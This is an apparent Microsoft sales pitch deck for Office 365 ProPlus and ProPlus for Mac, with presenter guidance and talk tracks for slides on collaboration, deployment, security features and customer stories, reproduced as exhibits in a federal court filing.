**Guidance**: This slide explores the "visualize data in new ways" portion of the "unlocks creativity" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "unlocks creativity" Microsoft 365 pillar.

**Talk track**: With new chart types, Power BI integration, and new functionality in Excel, ProPlus will help you and your people visualize data in new ways.

Power Pivot:
- Perform powerful data analysis and create sophisticated data models rapidly
- Mash up large volumes of data from various sources
- Easily share Power Pivot spreadsheets just like any other file

New charts:
- Transform geographic data into high-fidelity visualizations
- Identify insights, trends and opportunities in your data
- Insert maps into Word, PowerPoint, and Outlook

Get and transform:
- Utilize fast, easy data gathering and shaping capabilities
- Connect, combine, and refine data sources to meet your analysis needs
- Use in conjunction with Power BI and in the Power Query Add-In

Power BI*:
- Publish your data directly from Excel directly to Power BI
- Create interactive reports and dashboards
- Visualize hierarchical, financial, and geospatial data with new charts

Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your teams to visualize data in new ways.

*Requires a Power BI subscription.



**Guidance**: This slide explores the "work naturally with ink and touch" portion of the "unlocks creativity" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "unlocks creativity" Microsoft 365 pillar.

**Talk track**: Work naturally with ink and touch within your ProPlus applications.

Intelligent digital ink*:
- Use your finger or pen to write and draw or highlight content
- Replay handwriting to provide step-by-step instructions
- Transform drawings into shapes with shape recognition

Touch-optimized apps*:
- Use natural gestures and swipes to interact with apps
- Take advantage of a more immersive application experience

Please note this is not an exhaustive list. There are more features in ProPlus that will enable your people to work naturally with ink and touch.

*Touch capable tablet or PC required. Pen accessory may be sold separately.

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 16 of 28



**Guidance**: This slide is the "hero" slide for the "built for teamwork" section. If you want to consolidate your presentation and not explore each of the main topics and supporting features/capabilities highlighted on this slide, you can remove any related subsequent slides. We recommend providing some explanation for the features showcased here. The details for those features can be found in the following slides and in the feature-specific slides in the appendix. The talk track has been put together with the assumption that all following slides will be shown. If you are condensing your presentation, your own talk track may require modification. This slide also features hyperlinks that will help you navigate to any one of the topic slides and can be used to skip ahead to a section you or the audience feels is most relevant.

**Talk track**: ProPlus is built for teamwork with collaboration in its DNA. There are two major topics we want to explore here, with many features that support those topics.

Our focus today will be on how ProPlus empowers you and your users to:
- Work together—in the same room or miles apart…
- …and at the same time or on your own time.



**Guidance**: This slide explores the "work together—in the same room or miles apart…" portion of the "built for teamwork" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "built for teamwork" Microsoft 365 pillar.

**Talk track**: ProPlus is built to enable people to work together—in the same room or miles apart. Let's look at some of the ways how.

Co-author together in Word, PowerPoint, and Excel*:
- Collaborate in real-time in the same document
- View where others are editing in the document
- Receive alerts when people enter or leave the document

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 1 of 28

Share ideas seamlessly with Skype for Business:
- Meet instantly with a fully integrated solution for voice, chat, or HD video*
- Reach other users even when they are not online
- Preload attachments to your online meeting from Outlook

Modernize teamwork with Office 365 Groups:
- Access a shared inbox of conversations, calendar, files, and notebook
- Discover Groups relevant to you based on what your peers' work
- Browse, join, and create Groups right from Outlook

Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your people to work together—in the same room or miles apart.

* For real-time co-authoring, co-authors must be using Office 2016 or Office Online.



**Guidance**: This slide explores the "…at the same time or on your own time" portion of the "built for teamwork" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "built for teamwork" Microsoft 365 pillar.

**Talk track**: ProPlus give you and your users to collaborate together at the same time or work separately on your own time. Let's explore.

Flag critical actions and inputs with @mentions:
- Get their attention with @ in the body of a message or meeting invite
- Select from your contact list and automatically add to the To line
- Search for messages that mention you

Easily find files shared with you:
- Share your document by inviting others from inside the app
- Review who has document access and their editing status

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 15 of 28

|  | • Define document access for each person you're sharing with<br><br>Never lose your work with Version History:<br>• Look back and understand how your files evolved over time<br>• Restore older versions in case you make a mistake<br>• Quickly access documents you have worked on recently<br><br>Please note this is not an exhaustive list. There are many more features in ProPlus that will enable your teams to work at the same time or on your own time. |
| --- | --- |
|  | **Guidance**: This slide is the "hero" slide for the "integrated for simplicity" section. If you want to consolidate your presentation and not explore each of the main topics and supporting features/capabilities highlighted on this slide, you can remove any related subsequent slides. We recommend providing some explanation for the features showcased here. The details for those features can be found in the following slides and in the feature-specific slides in the appendix. The talk track has been put together with the assumption that all following slides will be shown. If you are condensing your presentation, your own talk track may require modification. This slide also features hyperlinks that will help you navigate to any one of the topic slides and can be used to skip ahead to a section you or the audience feels is most relevant.<br><br>**Talk track**: ProPlus has been designed for simplicity for both users of the apps and services as well as the IT folks who manage the deployment. The goal of ProPlus and Microsoft 365 was to design a seamless experience across all its technologies. There are three main ways ProPlus does this. Let's check out the features and capabilities that make it possible.<br><br>ProPlus helps you and your people to:<br>• Access your work from anywhere<br>• Deploy, manage, and update with ease<br>• And ensure line-of-business (LOB) apps and macros function optimally |

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 19 of 28



**Guidance**: This slide explores the "Access your work anywhere" portion of the "integrated for simplicity" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "integrated for simplicity" Microsoft 365 pillar.

**Talk track**: ProPlus empowers you and your users to access work from anywhere. Let's take a look at the features that support that premise.

Use Office on all your devices with 5 PC, tablet, and phone activations:
- Get your office apps on every device with a single, unified experience
- Be productive from anywhere
- Work how and when you want

Stay productive anywhere with online versions of Office apps:
- Utilize a rich "near-desktop" experience
- Work anywhere with an internet connection
- Modify documents on the go

Access your work on any device and any platform:
- Access your files and data from any activated device, anywhere, on any platform, at any time
- Share and collaborate on documents directly from OneDrive
- Provide access to anyone in your organization

Please note this is not an exhaustive list. There are many more features in ProPlus that will enable you to access your work anywhere.



**Guidance**: This slide explores the "deploy, manage, and update with ease" portion of the "integrated for simplicity" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "integrated for simplicity" Microsoft 365 pillar.

**Talk track**: ProPlus simplifies the process for deploying the tech and continuing to manage updates. We'll look at how on this slide.

Always stay up-to-date with aligned Windows and ProPlus update cadence:
- Protect your organization with continuous updates and patches aligned to Windows releases
- Work on the latest and greatest versions of Office apps
- Get access to new Office features before perpetual clients
- Use the Office Deployment Tool (ODT) to manage deployment configurations

Manage seamlessly with Intune and Configuration Manager:
- Manage and deploy ProPlus with familiar technology
- Simplify the admin experience via the Microsoft Intune portal
- Control updates and deployment rollouts with System Center Configuration Manager (SCCM)

Optimize delivery with reduced package sizes and Peer Cache:
- Manage the deployment to devices in remote locations by enabling Configuration Manager clients to share updates with other clients directly from their local cache
- Take advantage of Binary Delta Compression for even lighter file downloads
- Save on network bandwidth needed to roll out updates

Get up and running faster via FastTrack deployment options:
- Use the tools, resources, and guidance provided by Microsoft experts to get the most from Office ProPlus

|  | • Get your Office 365 environment ready for use and plan rollout and usage within your organization<br>• Speed implementation, drive adoption, and help users get acquainted with the value of Office ProPlus<br><br>Please note this is not an exhaustive list. There are many more features in ProPlus that will enable you and your staff to deploy, manage, and update ProPlus with ease. |
|---|---|
|  | **Guidance**: This slide explores the "ensure LOB apps and macros function optimally" portion of the "integrated for simplicity" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "integrated for simplicity" Microsoft 365 pillar.<br><br>**Talk track**: When deploying ProPlus, it is imperative that the existing Line of Business apps and macros your organization has developed function properly. We have a number of tools that will help you assess your readiness to make the move. We'll explore a few now.<br><br>Make sure existing apps function correctly with Ready for Windows:<br>• Check for app compatibility in the global Ready for Windows Directory<br>• Show your support for ProPlus and Windows 10, giving customers confidence in the quality and reliability of your software<br><br>Assess macros and add-in compatibility with the Readiness Toolkit:<br>• Identify compatibility issues with your Microsoft Visual Basic for Applications (VBA) macros and add-ins that you use with Office<br>• Assess your readiness to move to ProPlus with the Readiness Report Creator<br>• Download the Readiness Toolkit for free from the Microsoft Download Center<br><br>Please note this is not an exhaustive list. There are more features in ProPlus that will enable you and your people to ensure LOB apps and macros function optimally. |

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 22 of 28



**Guidance**: This slide is the "hero" slide for the "intelligent security" section. If you want to consolidate your presentation and not explore each of the main topics and supporting features/capabilities highlighted on this slide, you can remove any related subsequent slides. We recommend providing some explanation for the features showcased here. The details for those features can be found in the following slides and in the feature-specific slides in the appendix. The talk track has been put together with the assumption that all following slides will be shown. If you are condensing your presentation, your own talk track may require modification. This slide also features hyperlinks that will help you navigate to any one of the topic slides and can be used to skip ahead to a section you or the audience feels is most relevant.

**Talk track**: Your organization's protection is priority one for the Office 365 folks who develop and work on ProPlus.

ProPlus has been designed following the Microsoft Security Development Lifecycle. Here at Microsoft, we bring together the best practices from two decades of building enterprise software and managing online services to give you an integrated software-as-a-service solution. We also provide you with numerous resources, features, and capabilities to ensure you organization is safe from even the most advanced threats. Let's check how ProPlus makes this a reality.

ProPlus helps you and your people to:
- Detect issues before they happen
- Safeguard your company's most important data

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 23 of 28



**Guidance**: This slide explores the "detect issues before they happen" portion of the "intelligent security" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "intelligent security" Microsoft 365 pillar.

**Talk track**: Cybersecurity threats have become ubiquitous in today's digital landscape and organizations must arm themselves against advanced attacks. There are a number of features in the ecosystem surrounding ProPlus that makes it possible to defend your organization against these sophisticated threats.

Defend against malicious documents with ATP Safe Attachments*:
- Protect your organization from harmful attachments through ATP Safe Attachments policies
- Set policies to identify if email attachments are malicious
- View ATP reports in the Office 365 Security and Compliance Center dashboard

Ensure hyperlinks in documents are harmless with ATP Safe Links*:
- Protect your organization from harmful hyperlinks through ATP Safe Links policies
- Create a custom blocked URL list for more advanced protection
- View ATP reports in the Office 365 Security and Compliance Center dashboard

Neutralize spear-phishing tactics using ATP URL Detonation*:
- Prevent users from being compromised by files linked to malicious URLs
- Configure a SafeLink policy that turns on the URL trace to track user clicks (especially useful for instances when users can bypass the warning and click through to blocked pages)
- Focus on remediation efforts for impacted users while not disrupting the work of unaffected users

Please note this is not an exhaustive list. There are more features in ProPlus that will enable you and teams to detect issues before they happen.

*Must have an E5 subscription or purchased a separate ATP subscription (for E1, E3, and ProPlus standalone SKUs)



**Guidance**: This slide explores the "safeguard your company's most important data" portion of the "intelligent security" Microsoft 365 pillar. Use this slide if relevant to your audience. This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation. The top bar navigation will enable you to jump to the selected section's "hero" slide, while the bottom "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature that relates to the "intelligent security" Microsoft 365 pillar.

**Talk track**: Company data is one of the most important assets your organization owns. It is also the most sought-after prize malicious hackers attempt to get their hands on. ProPlus has a number of built-in strategies to keep your data where it belongs.

Prevent data loss via built-in Policy Tips:
- Identify sensitive information across many locations
- Safeguard sensitive information from accidental leaks
- Educate and empower end users with in-app policy tips

Encrypt sensitive messages with Office 365 Message Encryption:
- Reduce the risk of unintended disclosure by encrypting and rights-protecting email messages
- Control sensitive data with flexible policies or ad hoc customer controls
- Meet compliance needs more easily

Embrace multi-layer defense with Multi-Factor Authentication:
- Enforce an additional layer of security for user sign-ins and transactions
- Manage multi-factor authentication (MFA) policies from a unified Office 365 admin center

Case 0:20-cv-60416-XMC   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 117 of
726
Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 25 of 28

|  | • Establish authentication factors that work best for your users—using a mobile app, phone call, SMS, etc.<br><br>Please note this is not an exhaustive list. There are more features in ProPlus that will enable you and your staff to safeguard your company's most important data.<br><br>*Must have an E5 subscription or purchased a separate ATP subscription (for E1, E3, and ProPlus standalone SKUs) |
|---|---|
|  | **Guidance**: We suggest using the Office Enterprise Hero Demo as your source for demo material (demos.microsoft.com). You can do a demo here or after relevant sections throughout the presentation.<br><br>**Talk track**: N/a |
|  | **Guidance**: This slide showcases the broad range of customers, across industries, whose business has been impacted for the better by deploying ProPlus. We recommend focusing on available success stories that the audience would find most relatable.<br><br>**Talk track**: These are some of the many customers who have successfully deployed Office 365 ProPlus.  Each has a different story about how Office 365 ProPlus has helped improve collaboration, boost communication and drive more productivity within their workplaces.<br>• Hamburg Port Authority (HPA): Germany's Largest Port Adopts Office 365 ProPlus, Reduces Administration by 75 Percent<br>• Kindred Healthcare: Healthcare Provider Chooses Office 365 to Meet Compliance Needs, Boost Communications<br>• The Walsh Group: Construction Firm Improves Anywhere Access, Reduces IT Costs with Cloud Solution |

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 26 of 28

- L'Occitane en Provence: Retailer Improves Collaboration and Gains Licensing Flexibility with Office 365
- Sephora: Beauty Product Retailer Enables Work-Life Balance with Office 365 ProPlus
- Brock & Scott: Legal Firm Boosts Competitive Advantage, Productivity, by Sharing Best Practices
- TE Connectivity: TE Connectivity Delivers Extraordinary Customer Experience with Office 365 ProPlus
- Midroc Europe: European Property Developer Expands into New Markets with Office 365
- Swisscom: Swisscom Improves Mobility, Strengthens Collaboration with Office 365 ProPlus

These and other case studies and quotes are available on Microsoft Customer Stories customers.microsoft.com.



**Guidance**: The purpose of this slide is to provide assurance to the customer that Microsoft has a proven and programmatic method for helping them deploy ProPlus within their organization. The point to make here is they don't have to do this themselves, but there are resources available (for free for deployments over 50 seats) to help onboard and get them up and running quickly and easily.

**Talk track**: Our mission as a company—to help every individual and business on the planet achieve more—is not only about the products we create, but how we enable customers to get the most value out of those products.

We've designed FastTrack – our customer success service – to help you move to Office 365, smoothly and with confidence, and realize business value faster. It is available as part of your Office 365 subscription*, and provides you with a set of best practices, tools, resources, and experts committed to making the experience with Office 365 a success.

With the FastTrack Center benefit for Office 365, you work remotely with Microsoft specialists** to get your Office 365 environment ready for use and plan rollout and usage within your organization. Microsoft has 800+ FastTrack engineers worldwide who

have worked with customers to develop over 51,000 success plans to onboard and drive adoption of Office 365.

Microsoft FastTrack assists with core onboarding, which involves service provisioning and tenant and identity integration. It also includes steps for providing a foundation for onboarding services like Exchange Online, SharePoint Online, Skype for Business Online and Office 365 ProPlus.

For Office 365 ProPlus, we further provide guidance on:
- Addressing deployment issues such as application compatibility with an assessment using Office Telemetry***
- Assigning end-user licenses using the Office 365 admin center and Windows PowerShell
- Configuring update settings using the Office Deployment Tool
- Setting up a single on-site distribution server for Office 365 ProPlus, including assistance with the creation of a configuration.xml file for use with the Office Deployment Tool
- Deploying using Microsoft System Center Configuration Manager, including assistance with the creation of System Center Configuration Manager packaging
- Installing Office 365 ProPlus from the Office 365 portal using Click-to-Run
- Installing Office Mobile apps (like Outlook Mobile, Word Mobile, Excel Mobile, and PowerPoint Mobile) on your iOS, Android, or Windows Mobile devices

Microsoft FastTrack has assisted in the migration of over 4.1M seats and 3.7PB of data, enabling over 22,000 customers to experience the benefits of Office 365.

For more information on Microsoft FastTrack, visit http://fasttrack.microsoft.com.

DISCLAIMERS:
*FastTrack resources and services are included with Office 365 ProPlus for customers with at least 50 seats. For 50-149 seat customers, we provide migration guidance only. 150 seats and above qualify for the migration benefit using the migration factory.

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 28 of 28

| | |
|---|---|
| | **The FastTrack Center is available during normal business hours for a given region. Assistance is available in Traditional Chinese and Simplified Chinese (resources speak Mandarin only), English, French, German, Italian, Japanese, Korean, Portuguese (Brazil), Spanish, Thai, and Vietnamese.<br><br>***Office Telemetry available to FastTrack customers with greater than 20,000 seats. |
|  | **Guidance**: Use this slide to wrap up the conversation and provide some clear and actionable "go-dos". This slide should likely be modified based on the specific action you want the audience to take.<br><br>**Talk track**: If you are interested in learning more about the value Office 365 ProPlus can provide to your company, there are a number of additional materials available for continued education. We recommend the following:<br>• Dive deeper into Office 365 products and solutions<br>• Schedule a hands-on Customer Immersion Experience<br>• Initiate an Office 365 pilot through FastTrack |
| Thank you. | **Guidance**: Closing slide. Wrap up the conversation and ask if there are any questions or comments.<br><br>**Talk track**: Thank you for taking the time to discuss with us today. Are there any additional question before we wrap up? |

Case 0:20-cv-60416-XXXX   Document 3-8   Entered on FLSD Docket 02/26/2020   Page 1 of 26

# EXHIBIT 6

# Office 365 ProPlus for Mac Pitch Deck Overview

**Last Updated: March, 2018**

Office 365 ProPlus for Mac is the most secure suite of Office cloud productivity apps, offering the broadest and deepest set of capabilities across all your devices, including rich, intelligent services that assist in content creation, analysis, scheduling, and communications, with immediate access to documents in the cloud.

This presentation is intended to provide an overview of the breadth of value that Office 365 ProPlus for Mac offers. The 'Office 365 ProPlus for Mac' Pitch Deck presentation is our hero story for the Office apps.

This presentation focuses on product truths and customer-driven business scenarios and includes supplemental material that highlights the growing innovation gap between Office 365 ProPlus and legacy clients and the interdependency of Office 365 ProPlus with other Office 365 services. Please note, there is an extensive appendix of materials that can be used to support the core product pitch.

We suggest using the core pitch portion of the deck either in its entirety as part of a 45-60 minute session or customizing elements of it for a more specific presentation.

| | |
|---|---|
| **Presentation** | 45-60 mins |
| **Open Discussion** | 10 mins |

Case 0:20-cv-60416-XXXX   Document 3-8   Entered on FLSD Docket 02/26/2020   Page 123 of 726

| Slide | Notes |
|---|---|
|  | **Guidance**: <br> • Hidden slide, not to be shown to customers <br> • Provides guidance on who the target of the presentation is, desired outcomes, how to present the deck, usage and contact info, and more <br> • While ProPlus for Mac does not support all the features and capabilities of its Windows counterpart, it is important to highlight the continued investments Microsoft is making in Office for Mac <br>     ◦ Same code base as Windows <br>     ◦ Supports the same core scenarios as Windows <br>     ◦ Microsoft treats Mac as a first-class citizen <br>     ◦ Etc. <br><br> **Talk track**: N/a |
|  | **Guidance**: <br> • Title slide <br> • Use for introductions <br> • Set the agenda <br> • Etc. <br><br> **Talk track**: N/a |
| Technology's role in the workplace <br> The importance of workforce engagement through tech <br><br> **75%** of workers say their employers don't give them access to the latest technology to do their job efficiently <br> **2/5** employees state they would quit their jobs over poor employee technology <br> **21%** greater productivity among teams with high employee engagement <br> **21%** greater profitability for highly engaged business units | **Guidance**: <br> • Make the case that employee engagement is imperative for a thriving workplace <br> • Technology is a critical component of engaging employees <br> • Use compelling data points and industry research <br><br> **Talk track**: Let's start off by looking at technology's role in the modern workplace and how said technology can be critically important to the well-being of your workforce. |

There has been a lot of research conducted around the topic of employee engagement and satisfaction in the workplace and one of the key takeaways folks are finding is that technology is a crucial component of overall satisfaction. A recent study by Staples found that 75% of American workers say their employers don't give them access to the latest technology to do their job efficiently[1]. Another study suggested that 2 in 5 employees state they would quit their jobs over poor workplace technology[2]. Taken together, these are staggering statistics that highlight the value workers are placing on the technology available to them and the role it plays in their job satisfaction and engagement.

Having more highly engaged teams also pays off in the long run. Gallup suggests that teams with high employee engagement rates are 21% more productive and have 28% less internal theft than those with low engagement[3]. Additionally, highly engaged business units result in 21% greater profitability according to Gallup[4].

Gallup also estimates that actively disengaged employees cost the U.S. $483 billion to $605 billion each year in lost productivity[10].

At the end of the day, the research paints a pretty clear picture that effective technologies are a major component of employee engagement. And employee engagement is key driver of productivity and profitability.

In this presentation, we will explore how Microsoft technologies can help drive greater employee engagement across your organization. Microsoft's mantra is "to empower every person and every organization on the planet to achieve more." Today we'll explore how to make this vision a reality.

**Additional notes**:

Supporting data points:
1. 75% of American workers say their employers don't give them access to the latest technology to do their job efficiently
2. 2 in 5 employees state they would quit their jobs over poor workplace technology

3. Teams with high employee engagement rates are 21% more productive and have 28% less internal theft than those with low engagement
4. Highly engaged business units result in 21% greater profitability
5. Employees who believe their workplace effectively uses mobile tech are more creative, satisfied, and productive at work
6. Employees who spend 60% to 80% of their time working remotely are likely to have the highest workplace engagement
7. Employee retention will increase 10% by 2020 in organizations that have a "choose your own work style" culture
8. Productivity improves by 20-25% in organizations with connected employees
9. Employees who are engaged are 27% more likely to report "excellent" performance
10. Gallup estimates that actively disengaged employees cost the U.S. $483 billion to $605 billion each year in lost productivity

Sources:
1. The Staples Business Advantage Workplace Index 2016: Measuring Workplace Trends and Work Culture; https://go.staplesadvantage.com/workplaceindex2016
2. US Future-Ready Workforce Study, 2016
3. Gallup, Managing Employee Risk Requires a Culture of Compliance, 2016; http://www.gallup.com/businessjournal/190352/managing-employee-risk-requires-culture-compliance.aspx
4. Gallup, State of the American Workplace, 2017; http://news.gallup.com/reports/199961/7.aspx#aspnetForm
5. The Economist: Intelligence Unit; http://www.arubanetworks.com/pdf-viewer/?q=/assets/EIUStudy.pdf
6. Gallup, 2017; http://news.gallup.com/businessjournal/206180/engaged-remote-workforce.aspx
7. Gartner Predicts 2017: Boosting Business Results Through Personal Choice in the Digital Workplace; https://www.gartner.com/doc/3512517/predicts--boosting-business-results
8. McKinsey, the social economy: Unlocking value and productivity through social technologies; https://www.mckinsey.com/industries/high-tech/our-insights/the-social-economy

Case 0:20-cv-60416-XXXC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 6 of 26

9. Gallup, Well-Being Enhances Benefits of Employee Engagement, 2015; http://news.gallup.com/businessjournal/186386/enhances-benefits-employee-engagement.aspx

10. Gallup, State of the American Workplace, 2017; http://news.gallup.com/reports/199961/7.aspx#aspnetForm



Office 365 **ProPlus** for Mac overview

**Guidance**:

- A 10,000-foot view of the ProPlus for Mac suite of products and services
- Use this slide to level-set with the audience what we are specifically talking about when we say "ProPlus"
- This slide will also help you quickly articulate the value of ProPlus for Mac at a high-level

**Talk track**: Let's hone in on the main topic of today's conversation and that is ProPlus for Mac. When people think of Office traditionally, they are thinking of the apps that comprise the ProPlus suite: Outlook, Word, PowerPoint, Excel, and so on. While the broader Office 365 Enterprise SKUs (E3, and E5) contain ProPlus, they also provide additional services such as SharePoint, Exchange, Teams, Yammer, and more. Our focus here is on the ProPlus specific value proposition and why it may be a better option than a traditional perpetual client license model. (And also, why it is better than any other competitor software on the market)! But we will explore that topic in more detail in later slides.

To give a quick summary, ProPlus for Mac contains all the desktop apps your people know, love, and have likely been using for many years.

- Outlook – our signature email application that helps you communicate
- Word – the world's universal word processor and document creator
- Excel – the favored spreadsheet app
- PowerPoint – the de-facto standard in presentation software
- OneNote – the most prominent note taking tool
- OneDrive – a file hosting service for anywhere access to your info
- Skype for Business – software to help connect people through IM, phone, and video calls

But ProPlus SKUs also come with a number of additional benefits, many of which are unavailable in perpetually licensed versions. These benefits include:

- 5 PC installs—This means each employee can activate Office on a broad range of Mac devices with access to all shared files and data that is tied to their own account
- 5 tablets and 5 phones—Employees can also put Office on their iPads and iPhones (or other mobile devices) so they can access their apps and info from anywhere
- Online versions—Your people will also get access to robust online versions of their office apps so they can get work done on any device, regardless of whether Office is installed, anywhere they have an internet connection
- 1 TB cloud storage—Because ProPlus comes with OneDrive, your people don't need to worry about running out of space on their local machines—there is ample room in the cloud for all their files
- Up-to-date—This is a major advantage over perpetual licenses as your apps will always be up-to-date with the latest and greatest features from the Office for Mac teams at Microsoft
- Secure and compliant—ProPlus boasts cutting-edge security practices with five layers of security and proactive monitoring help keep customer data safe
- FastTrack assistance—Microsoft FastTrack for Office 365 is our customer success service designed to help you move to Office 365 smoothly and with confidence, and realize business value faster
- 24/7 phone support—Microsoft Support provides telephone and online answers, how-to resources and connections with other Office 365 customers for setup and quick fixes



**Guidance**:
- Highlights the investments Microsoft is making in the ProPlus/Office for Mac platform
- This slide is intended to showcase how Mac is reaching core scenario parity with Windows versions but continuing to invest in a unique Mac experience

**Talk track**: It is very important to note that Mac is a first-class citizen in the Office universe and a core part of our future strategy at Microsoft. We are continuing to make strides in bringing best-in-class productivity features to Mac so that we can democratize Office across all platforms.

**Same codebase**: Like mentioned above, we are invested in providing the same great Office experiences on Mac as we do on Windows. New features and capabilities are all being made available on Mac, faster than ever before because we are now using the same codebase as Windows to bring new features to market.

**Functionality driven**: 100% parity between Windows and Mac is not our goal. We are focused on providing the same great Office experience through core scenarios such as real-time collaboration, document sharing, creative capabilities, version history, etc.; while also devoting resources into elements that are uniquely Mac. Which leads to our next investment...

**Platform optimized**: There are many features and functions that are uniquely Mac. And we have built ProPlus for Mac to take advantage of those unique characteristics. From the operating system to the Touch Bar, ProPlus for Mac is optimized to bring out the best in Apple devices.

Case 0:20-cv-60416-XXXX   Document 3-8   Entered on FLSD Docket 02/26/2020   Page 9 of 26



**ProPlus** for Mac
Delivering on the promises of Office 365

Unlocks creativity | Built for teamwork | Integrated for simplicity | Intelligent security

**Guidance**:
- Bring the conversation full circle and explore how the value of ProPlus for Mac is manifested by these four core benefits
- Use this slide's hyperlinks to navigate to different sections within the deck
- If you want to specifically touch on a topic and ignore others, just click or touch the images or titles to jump to that section
- If you want to move through the deck chronologically, simply progress the slide

**Talk track**: The value of ProPlus for Mac can best be summarized by the following core benefits.

**Unlocks creativity**: ProPlus for Mac enables you work naturally with ink, voice, and touch and visualize information in new ways, all in one connected experience across all your devices.

**Built for teamwork**: ProPlus for Mac helps connect your entire workforce, regardless of their location. Email and calendar with Exchange. Connect to people, content, and apps with SharePoint. Voice, video, and chat with Skype and Microsoft Teams. Network across the organization with Yammer. And co-author together with Office 365.

**Integrated for simplicity**: Minimize total-cost-of-ownership across deployment, management, and servicing. Take advantage of broad support for Mac and iOS platforms. Establish comprehensive management of your entire workforce.

**Intelligent security**: ProPlus for Mac also connects to a robust suite of cybersecurity products and features that deliver advanced identity and access management, information protection, threat protection, and security management. Taken together, these capabilities will help you better protect your organization and meet rigorous compliance mandates such as GDPR and industry regulations.

With this summary of the ProPlus for Mac umbrella value proposition, let's now shift our focus to how ProPlus specifically delivers on these promises. In the following sections we will explore some of our top features that we feel will help your organization unlock

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 13 of 26

|  | creativity, collaborate as a team, make ProPlus for Mac easier to use and deploy, and protect your company's information. |
| --- | --- |
|  | **Guidance**:<br>• The "hero" slide for the "unlocks creativity" section<br>• Remove subsequent section slides if you want to consolidate your presentation/ not explore each of the main topics and supporting features/capabilities highlighted on this slide<br>• Feature details can be found in the following slides and in the feature-specific slides in the appendix<br>• The talk track has been put together with the assumption that all following slides will be shown<br>• This slide also features hyperlinks that will help you navigate to any one of the topic slides<br><br>**Talk track**: ProPlus for Mac empowers your users to craft truly engaging content that tells your story as an organization and as people. There are four main topics we want to explore here and numerous features that support those topics.<br><br>Our focus today will be on how ProPlus empowers your users to:<br>• Make amazing content<br>• Get work done smarter and faster<br>• Visualize data in new ways<br>• And work naturally with ink and touch |

Case 0:20-cv-60416-XXXX   Document 1-1   Entered on FLSD Docket 02/26/2020   Page 13 of 26



**Guidance**:
- Emphasize how ProPlus for Mac features enable the audience to "make amazing content"
- This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation
- The top bar navigation will enable you to jump to the selected section's "hero" slide
- The "click here for a feature overview" bar will take you to a slide in the appendix that features a PowerPoint Zoom overview of every feature

**Talk track**: Let's explore how ProPlus for Mac enables you and your users to make amazing content.

Build stunning slides in a few clicks using PowerPoint Designer:
- Create designer-grade presentations in minutes
- Maximize visual impact with multiple design options
- Take advantage of cloud intelligence to analyze and identify the best imagery for your presentations

Create cinematic experiences with PowerPoint Morph:
- Make your presentations more dynamic and exciting
- Create cinematic motion effortlessly
- Look like a seasoned animation expert with just the click of a button

Research and outline a topic quickly with PowerPoint QuickStarter:
- Start building a presentation quickly with pre-defined outlines and research
- Integrate information intelligently gathered from the web
- Take advantage of built-in tips and suggested talking points

Give better presentations via the improved Presenter View:
- Take full control over your presentations
- See what's coming with a preview of the next slide
- Stay on top of details like speaker notes and timing while your audience only sees your presentation on the big screen

Please note this is not an exhaustive list. There are many more features in ProPlus for Mac that will enable your people to make amazing content.



**Guidance:**

- Emphasize how ProPlus for Mac features enable the audience to "get work done smarter and faster"
- This slide features a number of hyperlinks that enable you to navigate to other sections of the presentation
- The top bar navigation will enable you to jump to the selected section's "hero" slide
